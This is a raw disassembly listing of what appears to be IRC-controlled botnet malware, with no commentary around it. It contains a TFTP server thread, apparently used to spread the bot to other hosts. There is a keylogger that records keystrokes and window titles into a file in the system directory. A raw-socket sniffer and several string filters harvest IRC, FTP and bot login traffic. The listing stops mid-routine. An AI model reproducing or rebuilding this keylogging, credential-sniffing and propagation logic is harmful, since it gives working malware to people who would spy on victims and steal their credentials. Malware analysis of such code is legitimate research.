var_576 = byte ptr -576h
var_575 = byte ptr -575h
DstBuf = byte ptr -574h
var_374 = dword ptr -374h
Filename = byte ptr -370h
Str = byte ptr -26Ch
var_168 = dword ptr -168h
var_164 = dword ptr -164h
var_160 = dword ptr -160h
var_15C = byte ptr -15Ch
var_DC = dword ptr -0DCh
var_D8 = dword ptr -0D8h
var_D0 = byte ptr -0D0h
var_CF = byte ptr -0CFh
var_CE = byte ptr -0CEh
var_CD = byte ptr -0CDh
Dest = byte ptr -50h
var_3C = byte ptr -3Ch
var_38 = dword ptr -38h
Dst = word ptr -2Ch
var_2A = word ptr -2Ah
var_28 = dword ptr -28h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
File = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 87Ch
mov edx, [ebp+arg_0]
push ebx
push esi
push edi
push 1
xor ebx, ebx
pop eax
mov ecx, 0A9h
mov esi, edx
lea edi, [ebp+var_374]
push ebx
push 2
rep movsd
inc [ebp+var_164]
push 2
mov [ebp+var_10], eax
mov [ebp+var_14], eax
mov [ebp+var_8], eax
mov [edx+2A0h], eax
call dword_4E42A0 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_4122EF
push 190h
call ds:dword_4F6380 ; Sleep
cmp [ebp+var_D8], ebx
jnz short loc_4122CF
push ebx ; int
lea eax, [ebp+var_778]
push [ebp+var_DC] ; int
push eax ; int
lea eax, [ebp+var_15C]
push eax ; Str
push [ebp+var_374] ; int
call sub_409D6C
add esp, 14h
loc_4122CF: ; CODE XREF: sub_41224F+5B�j
lea eax, [ebp+var_778]
push eax
call sub_415C77
push [ebp+var_168]
call sub_40BAAA
pop ecx
pop ecx
push ebx
call ds:dword_4F63D4 ; ExitThread
loc_4122EF: ; CODE XREF: sub_41224F+48�j
lea eax, [ebp+var_10]
push 4
push eax
mov edi, 0FFFFh
push 4
push edi
push esi
call dword_4E4200 ; setsockopt
lea eax, [ebp+var_14]
push 4
push eax
push 0FFFFFFFBh
push edi
push esi
call dword_4E4200 ; setsockopt
mov eax, [ebp+var_168]
push 10h ; Size
imul eax, 234h
push ebx ; Val
mov dword_457134[eax], esi
lea eax, [ebp+Dst]
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push [ebp+var_160]
call dword_4E4220 ; htons
mov [ebp+var_2A], ax
lea eax, [ebp+Dst]
push 10h
push eax
push esi
mov [ebp+var_28], ebx
call dword_4E424C ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_412379
push 1388h
call ds:dword_4F6380 ; Sleep
dec [ebp+var_164]
push [ebp+arg_0]
jmp loc_4126C0
; ---------------------------------------------------------------------------
loc_412379: ; CODE XREF: sub_41224F+10F�j
lea eax, [ebp+Filename]
push offset aRb_0 ; "rb"
push eax ; Filename
call _fopen
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+File], eax
jnz short loc_4123DF
push 190h
call ds:dword_4F6380 ; Sleep
push ebx ; int
lea eax, [ebp+var_778]
push [ebp+var_DC] ; int
push eax ; int
lea eax, [ebp+var_15C]
push eax ; Str
push [ebp+var_374] ; int
call sub_409D6C
lea eax, [ebp+var_778]
push eax
call sub_415C77
push [ebp+var_168]
call sub_40BAAA
add esp, 1Ch
push ebx
call ds:dword_4F63D4 ; ExitThread
loc_4123DF: ; CODE XREF: sub_41224F+142�j
; sub_41224F+42B�j
mov edi, [ebp+arg_0]
cmp [edi+2A0h], ebx
jz loc_412683
mov edi, 80h
lea eax, [ebp+var_D0]
push edi ; Size
push ebx ; Val
push eax ; Dst
mov [ebp+var_1C], 5
mov [ebp+var_18], 1388h
mov [ebp+var_878], esi
mov [ebp+var_87C], 1
call _memset
add esp, 0Ch
lea eax, [ebp+var_1C]
push eax
push ebx
lea eax, [ebp+var_87C]
push ebx
push eax
push ebx
call dword_4E4208 ; select
test eax, eax
jle loc_412677
mov al, byte_4E6FCC
mov ecx, edi
mov [ebp+var_578], al
xor eax, eax
lea edi, [ebp+var_577]
mov [ebp+var_C], 10h
rep stosd
stosw
stosb
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_3C]
push eax
push ebx
lea eax, [ebp+var_D0]
push 80h
push eax
push esi
call dword_4E41F8 ; recvfrom
push [ebp+var_38]
mov [ebp+var_8], eax
call dword_4E42AC ; inet_ntoa
push eax ; Format
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
cmp [ebp+var_D0], bl
pop ecx
pop ecx
jnz loc_412661
cmp [ebp+var_CF], 1
jnz loc_412567
lea eax, [ebp+Str]
push eax ; Str
call _strlen
push ebx ; Origin
push ebx ; Offset
push [ebp+File] ; File
call _fseek
push [ebp+File] ; File
lea eax, [ebp+DstBuf]
mov [ebp+var_578], bl
mov [ebp+var_577], 3
push 200h ; Count
push 1 ; ElementSize
push eax ; DstBuf
mov [ebp+var_576], bl
mov [ebp+var_575], 1
call sub_41EFA0
add esp, 20h
lea ecx, [ebp+var_3C]
mov [ebp+var_8], eax
add eax, 4
push [ebp+var_C]
push ecx
push ebx
push eax
lea eax, [ebp+var_578]
push eax
push esi
call dword_4E4284 ; sendto
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+var_778]
push offset aTftpTransferSt ; "Tftp transfer started to: %s"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_D8], ebx
jnz short loc_412555
push ebx ; int
lea eax, [ebp+var_778]
push [ebp+var_DC] ; int
push eax ; int
lea eax, [ebp+var_15C]
push eax ; Str
push [ebp+var_374] ; int
call sub_409D6C
add esp, 14h
loc_412555: ; CODE XREF: sub_41224F+2E1�j
lea eax, [ebp+var_778]
push eax
call sub_415C77
pop ecx
jmp loc_412677
; ---------------------------------------------------------------------------
loc_412567: ; CODE XREF: sub_41224F+257�j
cmp [ebp+var_CF], 4
jnz loc_412661
mov cl, [ebp+var_CD]
mov al, [ebp+var_CE]
cmp cl, 0FFh
mov [ebp+var_578], bl
mov [ebp+var_577], 3
jnz short loc_4125A4
inc al
xor cl, cl
mov [ebp+var_576], al
mov [ebp+var_575], bl
jmp short loc_4125B2
; ---------------------------------------------------------------------------
loc_4125A4: ; CODE XREF: sub_41224F+341�j
inc cl
mov [ebp+var_576], al
mov [ebp+var_575], cl
loc_4125B2: ; CODE XREF: sub_41224F+353�j
movzx eax, al
movzx ecx, cl
shl eax, 8
add eax, ecx
mov edi, 200h
shl eax, 9
sub eax, edi
push ebx ; Origin
push eax ; Offset
push [ebp+File] ; File
call _fseek
push [ebp+File] ; File
lea eax, [ebp+DstBuf]
push edi ; Count
push 1 ; ElementSize
push eax ; DstBuf
call sub_41EFA0
add esp, 1Ch
mov edi, eax
lea eax, [ebp+var_3C]
mov [ebp+var_8], edi
push [ebp+var_C]
push eax
lea eax, [edi+4]
push ebx
push eax
lea eax, [ebp+var_578]
push eax
push esi
call dword_4E4284 ; sendto
cmp edi, ebx
jnz short loc_412677
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+var_778]
push offset aTftpTransferCo ; "Tftp transfer complete to: %s"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_D8], ebx
jnz short loc_41264C
push ebx ; int
lea eax, [ebp+var_778]
push [ebp+var_DC] ; int
push eax ; int
lea eax, [ebp+var_15C]
push eax ; Str
push [ebp+var_374] ; int
call sub_409D6C
add esp, 14h
loc_41264C: ; CODE XREF: sub_41224F+3D8�j
lea eax, [ebp+var_778]
push eax
call sub_415C77
inc dword_4E6D3C
pop ecx
jmp short loc_412677
; ---------------------------------------------------------------------------
loc_412661: ; CODE XREF: sub_41224F+24A�j
; sub_41224F+31F�j
push [ebp+var_C]
lea eax, [ebp+var_3C]
push eax
push ebx
push 9
push offset dword_44C788
push esi
call dword_4E4284 ; sendto
loc_412677: ; CODE XREF: sub_41224F+1E9�j
; sub_41224F+313�j ...
cmp [ebp+var_8], ebx
jg loc_4123DF
mov edi, [ebp+arg_0]
loc_412683: ; CODE XREF: sub_41224F+199�j
push esi
call dword_4E42B8 ; closesocket
push [ebp+File] ; File
call _fclose
dec [ebp+var_164]
cmp [edi+2A0h], ebx
pop ecx
jnz short loc_4126B4
push [ebp+var_168]
call sub_40BAAA
pop ecx
push ebx
call ds:dword_4F63D4 ; ExitThread
loc_4126B4: ; CODE XREF: sub_41224F+450�j
push 3E8h
call ds:dword_4F6380 ; Sleep
push edi
loc_4126C0: ; CODE XREF: sub_41224F+125�j
call sub_41224F
pop edi
pop esi
pop ebx
leave
retn 4
sub_41224F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4126CC(int,int,int,char Str,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int)
sub_4126CC proc near ; CODE XREF: sub_4127AD+B4�p
; sub_4127AD+253�p
Dest = byte ptr -314h
Filename = byte ptr -114h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
Str = byte ptr 14h
arg_8C = dword ptr 94h
arg_90 = dword ptr 98h
push ebp
mov ebp, esp
sub esp, 314h
lea eax, [ebp+var_10]
push esi
push eax
call ds:dword_4F6438 ; GetLocalTime
lea eax, [ebp+Filename]
push 104h
push eax
call ds:dword_4F637C ; GetSystemDirectoryA
lea eax, [ebp+Filename]
push offset asc_44CF04 ; "\\"
push eax ; Dest
call _strcat
lea eax, [ebp+Filename]
push offset aWinnt_bat ; "winnt.bat"
push eax ; Dest
call _strcat
lea eax, [ebp+Filename]
push offset aAb ; "ab"
push eax ; Filename
call _fopen
mov esi, eax
add esp, 18h
test esi, esi
jnz short loc_412733
push 1
pop eax
jmp short loc_4127AA
; ---------------------------------------------------------------------------
loc_412733: ; CODE XREF: sub_4126CC+60�j
movzx eax, [ebp+var_4]
push [ebp+arg_0]
push eax
movzx eax, [ebp+var_6]
push eax
movzx eax, [ebp+var_8]
push eax
movzx eax, [ebp+var_10]
push eax
movzx eax, [ebp+var_A]
push eax
movzx eax, [ebp+var_E]
push eax
push offset aDDDDDDS ; "[%d-%d-%d %d:%d:%d] %s\r\n"
push esi ; File
call _fprintf
push esi ; File
call _fclose
add esp, 28h
cmp [ebp+arg_90], 0
jnz short loc_4127A8
push [ebp+arg_0]
lea eax, [ebp+Dest]
push offset asc_44CF28 ; "-"
push 200h ; Count
push eax ; Dest
call __snprintf
push 0 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+arg_4] ; int
call sub_409D6C
add esp, 24h
loc_4127A8: ; CODE XREF: sub_4126CC+A3�j
xor eax, eax
loc_4127AA: ; CODE XREF: sub_4126CC+65�j
pop esi
leave
retn
sub_4126CC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4127AD proc near ; DATA XREF: sub_401CC7+4580�o
var_8DC = dword ptr -8DCh
var_8D8 = byte ptr -8D8h
Dest = byte ptr -4DCh
var_2DD = byte ptr -2DDh
Dst = byte ptr -2DCh
var_DC = byte ptr -0DCh
var_D8 = dword ptr -0D8h
var_48 = byte ptr -48h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8DCh
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
and [ebp+var_8DC], 0
push 25h
and [ebp+var_4], 0
pop ecx
mov esi, eax
lea edi, [ebp+var_DC]
rep movsd
mov dword ptr [eax+90h], 1
mov ecx, 0FFh
xor eax, eax
lea edi, [ebp+var_8D8]
rep stosd
call dword_4E41A4 ; GetForegroundWindow
lea ecx, [ebp+var_48]
push 3Ch
push ecx
push eax
mov [ebp+var_8], eax
call dword_4E41BC ; GetWindowTextA
mov ebx, 200h
loc_412808: ; CODE XREF: sub_4127AD+2C7�j
push 8
call ds:dword_4F6380 ; Sleep
call dword_4E41A4 ; GetForegroundWindow
cmp eax, [ebp+var_8]
jz short loc_412890
lea ecx, [ebp+var_48]
push 3Ch
push ecx
push eax
mov [ebp+var_8], eax
call dword_4E41BC ; GetWindowTextA
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+Dst]
push eax ; int
lea eax, [ebp+Dest]
push offset aSChangedWindow ; "%s (Changed Windows: %s)"
push eax ; int
call _sprintf
sub esp, 84h
lea esi, [ebp+var_DC]
lea eax, [ebp+Dest]
push 25h
pop ecx
mov edi, esp
push eax ; int
rep movsd
call sub_4126CC
mov [ebp+var_4], eax
push ebx ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0A4h
lea eax, [ebp+Dest]
push ebx ; Size
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
loc_412890: ; CODE XREF: sub_4127AD+6C�j
mov [ebp+arg_0], offset dword_44C79C
loc_412897: ; CODE XREF: sub_4127AD+2BD�j
push 10h
call dword_4E40F4 ; GetKeyState
movsx esi, ax
mov eax, [ebp+arg_0]
mov edi, [eax-4]
push edi
call dword_4E41EC ; GetAsyncKeyState
test ah, 80h
jz short loc_41292F
push 14h
call dword_4E40F4 ; GetKeyState
test ax, ax
jz short loc_4128E0
cmp esi, 0FFFFFFFFh
jle short loc_4128E0
cmp edi, 40h
jle short loc_4128E0
cmp edi, 5Bh
jge short loc_4128E0
mov [ebp+edi*4+var_8DC], 1
jmp loc_412A5F
; ---------------------------------------------------------------------------
loc_4128E0: ; CODE XREF: sub_4127AD+112�j
; sub_4127AD+117�j ...
push 14h
call dword_4E40F4 ; GetKeyState
test ax, ax
jz short loc_41290B
test esi, esi
jge short loc_41291F
cmp edi, 40h
jle short loc_41290B
cmp edi, 5Bh
jge short loc_41290B
mov [ebp+edi*4+var_8DC], 2
jmp loc_412A5F
; ---------------------------------------------------------------------------
loc_41290B: ; CODE XREF: sub_4127AD+13E�j
; sub_4127AD+147�j ...
test esi, esi
jge short loc_41291F
mov [ebp+edi*4+var_8DC], 3
jmp loc_412A5F
; ---------------------------------------------------------------------------
loc_41291F: ; CODE XREF: sub_4127AD+142�j
; sub_4127AD+160�j
mov [ebp+edi*4+var_8DC], 4
jmp loc_412A5F
; ---------------------------------------------------------------------------
loc_41292F: ; CODE XREF: sub_4127AD+105�j
mov esi, [ebp+edi*4+var_8DC]
lea eax, [ebp+edi*4+var_8DC]
test esi, esi
jz loc_412A5F
and dword ptr [eax], 0
lea eax, [ebp+Dst]
cmp edi, 8
push eax ; Str
jnz short loc_412967
call _strlen
and [ebp+eax+var_2DD], 0
pop ecx
jmp loc_412A5F
; ---------------------------------------------------------------------------
loc_412967: ; CODE XREF: sub_4127AD+1A5�j
call _strlen
cmp eax, 1B9h
pop ecx
jbe short loc_412999
call dword_4E41A4 ; GetForegroundWindow
lea ecx, [ebp+var_48]
push 3Ch
push ecx
push eax
call dword_4E41BC ; GetWindowTextA
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+Dst]
push eax
push offset aSBufferFullS ; "%s (Buffer full) (%s)"
jmp short loc_4129DA
; ---------------------------------------------------------------------------
loc_412999: ; CODE XREF: sub_4127AD+1C5�j
cmp edi, 0Dh
jnz loc_412A31
lea eax, [ebp+Dst]
push eax ; Str
call _strlen
test eax, eax
pop ecx
jz loc_412A5F
call dword_4E41A4 ; GetForegroundWindow
lea ecx, [ebp+var_48]
push 3Ch
push ecx
push eax
call dword_4E41BC ; GetWindowTextA
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+Dst]
push eax ; int
push offset aSReturnS ; "%s (Return) (%s)"
loc_4129DA: ; CODE XREF: sub_4127AD+1EA�j
lea eax, [ebp+Dest]
push eax ; int
call _sprintf
sub esp, 84h
lea esi, [ebp+var_DC]
lea eax, [ebp+Dest]
push 25h
pop ecx
mov edi, esp
push eax ; int
rep movsd
call sub_4126CC
mov [ebp+var_4], eax
push ebx ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0A4h
lea eax, [ebp+Dest]
push ebx ; Size
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
jmp short loc_412A5F
; ---------------------------------------------------------------------------
loc_412A31: ; CODE XREF: sub_4127AD+1EF�j
cmp esi, 1
jz short loc_412A4A
cmp esi, 3
jz short loc_412A4A
cmp esi, 2
jz short loc_412A45
cmp esi, 4
jnz short loc_412A5F
loc_412A45: ; CODE XREF: sub_4127AD+291�j
push [ebp+arg_0]
jmp short loc_412A51
; ---------------------------------------------------------------------------
loc_412A4A: ; CODE XREF: sub_4127AD+287�j
; sub_4127AD+28C�j
mov eax, [ebp+arg_0]
add eax, 7
push eax ; Source
loc_412A51: ; CODE XREF: sub_4127AD+29B�j
lea eax, [ebp+Dst]
push eax ; Dest
call _strcat
pop ecx
pop ecx
loc_412A5F: ; CODE XREF: sub_4127AD+12E�j
; sub_4127AD+159�j ...
add [ebp+arg_0], 14h
cmp [ebp+arg_0], offset dword_44CECC
jl loc_412897
cmp [ebp+var_4], 0
jz loc_412808
push [ebp+var_D8]
call sub_40BAAA
pop ecx
push 0
call ds:dword_4F63D4 ; ExitThread
sub_4127AD endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412A8E proc near ; DATA XREF: sub_401CC7+41AB�o
var_102B4 = byte ptr -102B4h
var_102AB = byte ptr -102ABh
var_102A8 = dword ptr -102A8h
var_102A0 = dword ptr -102A0h
var_10293 = byte ptr -10293h
Str = byte ptr -1028Ch
Dest = byte ptr -2B4h
var_B4 = dword ptr -0B4h
var_B0 = byte ptr -0B0h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = byte ptr -20h
Dst = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 102B4h
call __alloca_probe
mov edx, [ebp+arg_0]
push esi
push edi
push 1
pop eax
mov esi, edx
push 25h
lea edi, [ebp+var_B4]
pop ecx
mov [ebp+var_8], eax
rep movsd
mov [edx+90h], eax
xor esi, esi
push 10h ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push esi
call dword_4E4220 ; htons
push [ebp+var_B4]
mov [ebp+var_1A], ax
call sub_40AFA9
pop ecx
push eax
call dword_4E4260 ; inet_addr
push esi
push 3
push 2
mov [ebp+var_18], eax
call dword_4E42A0 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_4], edi
jnz short loc_412B63
call dword_4E41B4 ; WSAGetLastError
push eax
lea eax, [ebp+Dest]
push offset asc_44D804 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_28], esi
jnz short loc_412B46
push esi ; int
lea eax, [ebp+Dest]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+var_B0]
push eax ; Str
push [ebp+var_B4] ; int
call sub_409D6C
add esp, 14h
loc_412B46: ; CODE XREF: sub_412A8E+96�j
lea eax, [ebp+Dest]
push eax
call sub_415C77
push [ebp+var_30]
call sub_40BAAA
pop ecx
pop ecx
push esi
call ds:dword_4F63D4 ; ExitThread
loc_412B63: ; CODE XREF: sub_412A8E+76�j
mov eax, [ebp+var_30]
push 10h
imul eax, 234h
mov dword_457134[eax], edi
lea eax, [ebp+Dst]
push eax
push edi
call dword_4E424C ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_412BE8
call dword_4E41B4 ; WSAGetLastError
push eax
lea eax, [ebp+Dest]
push offset asc_44D830 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_28], esi
jnz short loc_412BC4
push esi ; int
lea eax, [ebp+Dest]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+var_B0]
push eax ; Str
push [ebp+var_B4] ; int
call sub_409D6C
add esp, 14h
loc_412BC4: ; CODE XREF: sub_412A8E+114�j
lea eax, [ebp+Dest]
push eax
call sub_415C77
pop ecx
push edi
call dword_4E42B8 ; closesocket
push [ebp+var_30]
call sub_40BAAA
pop ecx
push esi
call ds:dword_4F63D4 ; ExitThread
loc_412BE8: ; CODE XREF: sub_412A8E+F4�j
push esi
lea eax, [ebp+var_20]
push esi
push eax
push esi
push esi
lea eax, [ebp+var_8]
push 4
push eax
push 98000001h
push edi
call dword_4E41CC ; WSAIoctl
cmp eax, 0FFFFFFFFh
jnz short loc_412C6B
call dword_4E41B4 ; WSAGetLastError
push eax
lea eax, [ebp+Dest]
push offset asc_44D85C ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_28], esi
jnz short loc_412C47
push esi ; int
lea eax, [ebp+Dest]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+var_B0]
push eax ; Str
push [ebp+var_B4] ; int
call sub_409D6C
add esp, 14h
loc_412C47: ; CODE XREF: sub_412A8E+197�j
lea eax, [ebp+Dest]
push eax
call sub_415C77
pop ecx
push edi
call dword_4E42B8 ; closesocket
push [ebp+var_30]
call sub_40BAAA
pop ecx
push esi
call ds:dword_4F63D4 ; ExitThread
loc_412C6B: ; CODE XREF: sub_412A8E+177�j
push ebx
mov ebx, offset a_login ; ":.login"
loc_412C71: ; CODE XREF: sub_412A8E+21B�j
; sub_412A8E+22D�j ...
mov edi, 0FFFFh
lea eax, [ebp+var_102B4]
push edi ; Size
push esi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+var_102B4]
push esi
push edi
push eax
push [ebp+var_4]
call dword_4E4238 ; recv
cmp eax, 0FFFFFFFFh
jz loc_412D9E
cmp [ebp+var_102AB], 6
jnz short loc_412C71
mov eax, [ebp+var_102A8]
cmp [ebp+var_10293], 18h
mov [ebp+var_C], eax
jnz short loc_412C71
lea eax, [ebp+Str]
push offset aPsniff_0 ; "[PSNIFF]"
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_412C71
lea eax, [ebp+Str]
push offset asc_44D8C4 ; "-"
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_412C71
mov eax, ebx
xor edi, edi
test eax, eax
jz loc_412C71
mov [ebp+arg_0], ebx
loc_412CFA: ; CODE XREF: sub_412A8E+287�j
push eax ; SubStr
lea eax, [ebp+Str]
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_412D1C
inc edi
add [ebp+arg_0], 18h
mov eax, [ebp+arg_0]
jnz short loc_412CFA
jmp loc_412C71
; ---------------------------------------------------------------------------
loc_412D1C: ; CODE XREF: sub_412A8E+27D�j
lea eax, [ebp+Str]
push eax
push [ebp+var_102A0]
call dword_4E4150 ; htons
movzx eax, ax
push eax
push [ebp+var_C]
call dword_4E42AC ; inet_ntoa
push eax
lea eax, [edi+edi*2]
mov eax, dword_44CFAC[eax*8]
push off_44CF88[eax*4]
lea eax, [ebp+Dest]
push offset asc_44D8D4 ; "-"
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 1Ch
cmp [ebp+var_28], esi
jnz short loc_412D8C
push esi ; int
lea eax, [ebp+Dest]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+var_B0]
push eax ; Str
push [ebp+var_B4] ; int
call sub_409D6C
add esp, 14h
loc_412D8C: ; CODE XREF: sub_412A8E+2DC�j
lea eax, [ebp+Dest]
push eax
call sub_415C77
pop ecx
jmp loc_412C71
; ---------------------------------------------------------------------------
loc_412D9E: ; CODE XREF: sub_412A8E+20E�j
call dword_4E41B4 ; WSAGetLastError
push eax
push offset asc_44D88C ; "-"
lea eax, [ebp+Dest]
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 10h
cmp [ebp+var_28], esi
pop ebx
jnz short loc_412DE4
push esi ; int
lea eax, [ebp+Dest]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+var_B0]
push eax ; Str
push [ebp+var_B4] ; int
call sub_409D6C
add esp, 14h
loc_412DE4: ; CODE XREF: sub_412A8E+334�j
lea eax, [ebp+Dest]
push eax
call sub_415C77
pop ecx
push [ebp+var_4]
call dword_4E42B8 ; closesocket
push [ebp+var_30]
call sub_40BAAA
pop ecx
push esi
call ds:dword_4F63D4 ; ExitThread
sub_412A8E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_412E0A proc near ; CODE XREF: sub_413119+213�p
; sub_413119+239�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword_4E6FD0, eax
mov eax, offset dword_4E6FD0
retn
sub_412E0A endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_412E19(char *Str)
sub_412E19 proc near ; CODE XREF: sub_413119+2BF�p
Str = dword ptr 4
push esi
mov esi, [esp+4+Str]
push offset aBotSniff ; "Bot sniff"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_412E33
loc_412E2F: ; CODE XREF: sub_412E19+29�j
; sub_412E19+3A�j ...
xor al, al
pop esi
retn
; ---------------------------------------------------------------------------
loc_412E33: ; CODE XREF: sub_412E19+14�j
push offset aPiavnc ; "##piavnc##"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_412E2F
push offset aPsniff_1 ; "[PSNIFF]:"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_412E2F
push offset aPsniff_2 ; "PSNIFF//"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_412E2F
push offset aJoin_1 ; "JOIN #"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_412E7B
loc_412E77: ; CODE XREF: sub_412E19+71�j
; sub_412E19+82�j ...
mov al, 1
pop esi
retn
; ---------------------------------------------------------------------------
loc_412E7B: ; CODE XREF: sub_412E19+5C�j
push offset a302 ; "302 "
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_412E77
push offset a366 ; "366 "
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_412E77
push offset a_login_0 ; ":.login"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_412E77
push offset aLogin_0 ; ":!login"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_412E77
push offset aLogin_1 ; ":!Login"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_412E77
push offset a_login_1 ; ":.Login"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_412E77
push offset a_ident ; ":.ident"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_412E77
push offset aIdent_0 ; ":!ident"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz loc_412E77
push offset a_hashin ; ":.hashin"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz loc_412E77
push offset aHashin ; ":!hashin"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
pop esi
setnz al
retn
sub_412E19 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_412F30(char *Str)
sub_412F30 proc near ; CODE XREF: sub_413119+2F8�p
Str = dword ptr 4
push esi
mov esi, [esp+4+Str]
push offset aIrcSniff ; "IRC sniff"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_412F4A
loc_412F46: ; CODE XREF: sub_412F30+29�j
xor al, al
pop esi
retn
; ---------------------------------------------------------------------------
loc_412F4A: ; CODE XREF: sub_412F30+14�j
push offset aPiavnc ; "##piavnc##"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_412F46
push offset aOper ; "OPER "
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_412F70
loc_412F6C: ; CODE XREF: sub_412F30+4F�j
; sub_412F30+60�j
mov al, 1
pop esi
retn
; ---------------------------------------------------------------------------
loc_412F70: ; CODE XREF: sub_412F30+3A�j
push offset aNick_2 ; "NICK "
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_412F6C
push offset aOper_0 ; "oper "
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_412F6C
push offset aYouAreNowAnIrc ; "You are now an IRC Operator"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
pop esi
setnz al
retn
sub_412F30 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_412FA6(char *Str)
sub_412FA6 proc near ; CODE XREF: sub_413119+32E�p
Str = dword ptr 4
push esi
mov esi, [esp+4+Str]
push offset aFtpSniff ; "FTP sniff"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_412FC0
loc_412FBC: ; CODE XREF: sub_412FA6+29�j
; sub_412FA6+3A�j
xor al, al
pop esi
retn
; ---------------------------------------------------------------------------
loc_412FC0: ; CODE XREF: sub_412FA6+14�j
push offset aPiavnc ; "##piavnc##"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_412FBC
push offset aNick_3 ; "NICK "
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_412FBC
push offset a220 ; "220 "
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_412FF7
loc_412FF3: ; CODE XREF: sub_412FA6+60�j
; sub_412FA6+71�j
mov al, 1
pop esi
retn
; ---------------------------------------------------------------------------
